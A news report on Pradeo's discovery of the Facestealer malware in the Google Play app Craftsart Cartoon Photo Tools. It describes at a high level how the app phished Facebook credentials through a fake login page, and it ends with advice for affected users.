Cybersecurity firm Pradeo discovered a malicious app that was available on Google Play and installed by 100,000+ users.
Called Craftsart Cartoon Photo Tools, the app would allow users to convert photos into cartoons or painting-style images through filters.
It contained a virus called Facestealer that steals Facebook credentials and gains full access to victims’ accounts and all data such as credit card details, conversations, searches, etc.
Pradeo alerted the Google Play team and successfully removed the app from the store.
Evading Google’s Security
The app copies popular legitimate photo editing apps, the difference being that the malicious one has been injected with a small piece of code that easily bypasses the store’s safeguards.
However, the app didn’t seem to work well enough to hide that it was fake.
Users kept giving it one-star ratings along with warnings that it was fake, barely functional, or didn’t work at all.
How It Worked
When the app is launched, a Facebook login page is opened which is mandatory for the user in order to use the app.
When they enter their credentials, their username and password are automatically transmitted to cybercriminals that own the app.
They then use these credentials to compromise accounts in multiple ways, most commonly to commit financial fraud, send phishing links and spread fake news.
Sinister Uses Of Data
Facebook info can also be sold for huge sums on the dark web, and it can be used to spread propaganda on behalf of the highest bidder.
The app is connected to a domain registered in Russia which is connected to multiple malicious apps that were once available on Google Play.
To maintain their presence on the app store, it is common practice of cybercriminals to repackage apps and in some cases the repackaging was entirely automated.
Advice To Users
Pradeo has advised users who have the app to delete it immediately and to change their Facebook password.
It is also advisable to do a full factory reset of the phone and to always stay alert for malware and spyware hiding inside innocuous apps.